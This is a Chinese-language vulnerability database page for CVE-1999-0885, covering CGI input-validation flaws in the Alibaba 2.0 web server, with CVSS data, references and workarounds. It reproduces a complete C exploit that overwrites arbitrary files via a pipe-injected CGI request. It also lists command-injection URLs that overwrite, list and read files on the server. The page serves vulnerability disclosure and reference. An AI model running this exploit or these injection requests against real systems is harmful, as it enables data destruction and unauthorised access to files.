CVE-1999-0885
CVSS3.6
发布时间 :1999-11-03 00:00:00
修订时间 :2008-09-09 08:36:07
NMCOES    

[原文]Alibaba web server allows remote attackers to execute commands via a pipe character in a malformed URL.


[CNNVD]Alibaba软件多种CGI漏洞(CNNVD-199911-014)

        
        Alibaba Webserver自带一些CGI程序。
        Alibaba Webserver的这些脚本都没有很好处理用户输入的数据,远程攻击者可以利用这些漏洞浏览、覆盖、创建和删除服务器上的任意文件。
        

- CVSS (基础分值)

CVSS分值: 3.6 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0885
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0885
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-014
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/770
(UNKNOWN)  BID  770
http://www.securityfocus.com/templates/archive.pike?list=1&date=1999-11-01&msg=01BF261F.928821E0.kerb@fnusa.com
(UNKNOWN)  BUGTRAQ  19991103 More Alibaba Web Server problems...

- 漏洞信息

Alibaba软件多种CGI漏洞
低危 输入验证
1999-11-03 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        Alibaba Webserver自带一些CGI程序。
        Alibaba Webserver的这些脚本都没有很好处理用户输入的数据,远程攻击者可以利用这些漏洞浏览、覆盖、创建和删除服务器上的任意文件。
        

- 公告与补丁

        厂商补丁:
        Computer Software Manufaktur
        ----------------------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.csm.co.at/csm/alibaba.htm

- 漏洞信息 (19595)

Computer Software Manufaktur Alibaba 2.0 Multiple CGI Vulnerabilties (EDBID:19595)
windows remote
1999-11-03 Verified
0 Kerb
N/A [点击下载]
source: http://www.securityfocus.com/bid/770/info

There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server. 

/*

 Description: DoS against Alibaba 2.0 WebServer by wildcoyote
 Comments   : Based on advisorie by Prizm<Prizm@RESENTMENT.org>
              It is possible to overwrite any file on the remote box!
 Platforms  : Alibaba runs on Win95/98/NT
 Flamez to  : wildcoyote@coders-pt.org

*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

// If it didnt work, uncomment (JUST ONE) of the following defines...
// (In case of one of them, isn't present...)
#define vulnerable_cgi "/cgi-bin/post32.exe"
// #define vulnerable_cgi "/cgi-bin/post16.exe"
// #define vulnerable_cgi "/cgi-bin/get16.exe"


int 
openhost(char *host,int port) {
   int sock;
   struct sockaddr_in addr;
   struct hostent *he;
      
   he=gethostbyname(host);
   
   if (he==NULL) return -1;
   
   sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
    
   if (sock==-1) return -1;
    
   memcpy(&addr.sin_addr, he->h_addr, he->h_length);
   addr.sin_family=AF_INET;
   addr.sin_port=htons(port);

   if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1;
    
   return sock;
}

void 
sends(int sock,char *buf) {
  write(sock,buf,strlen(buf));
}

void 
overwrite(char *host, char *file, int port)
{
 int sock,i;
 char buf[512];
 printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
 printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
 sock=openhost(host,port);
 if(sock==-1) {
     printf("- Could not connect -\n");
     printf("Exiting...\n\n");
     exit(-1);
 }
 else printf("Connected to %s (%d)\n",host,port);
 sprintf(buf,"GET %s|echo%20>%s\n\n",vulnerable_cgi,file);
 printf("Oh k! Trying to overwrite the file...\n");
 sends(sock,buf);
 close(sock);
 printf("All done, the file was *probably* overwrited ;)\n");
 printf("Send flamez to wildcoyote@coders-pt.org, *Enjoy*...\n\n");
}

main(int argc, char *argv[])
{
 int sock,i;
 if (argc<3) {
    printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
    printf("Sintaxe: %s <host> <path to file to overwrite> [port - default 80]\n",argv[0]);
    printf("Warning: Path to file must be a valid DoS path :)\n");
    printf("Evil Example: %s www.vulnerable.alibaba.com c:\\windows\\win.ini\n",argv[0]);
    printf("Send flamez to wildcoyote@coders-pt.org, *Enjoy*...\n\n");
 }
 else if (argc==3) overwrite(argv[1],argv[2],80);
      else overwrite(argv[1],argv[2],atoi(argv[3]));
}
		

- 漏洞信息

11
Alibaba get32.exe Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Alibaba Web Server contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the get32.exe program not sanitizing user-supplied input. By appending additional commands via a | character, arbitrary commands can be executed under the privileges of the web server.

- 时间线

1999-11-03 1999-11-03
1999-11-03 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Remove the get32.exe program from the web server.

- 相关参考

- 漏洞作者

- 漏洞信息

Alibaba Multiple CGI Vulnerabilties
Input Validation Error 770
Yes Yes
1999-11-03 12:00:00 2009-07-11 12:56:00
Posted to Bugtraq by Kerb <kerb@fnusa.com> on November 3, 1999.

- 受影响的程序版本

Computer Software Manufaktur Alibaba 2.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- 漏洞讨论

There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server.

- 漏洞利用

http ://victim.com/cgi-bin/get32.exe|echo%20&gt;c:\file.txt
This will overwrite file.txt, or any file you specify. The get32.exe program will also allow the injection of code bytes into any executable file.

http ://www.victim.com/cgi-bin/alibaba.pl|dir
This will provide a directory listing of the CGI directory.

http ://www.victim.com/cgi-bin/tst.bat|type%20c:\file.txt
This will display the contents of file.txt

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站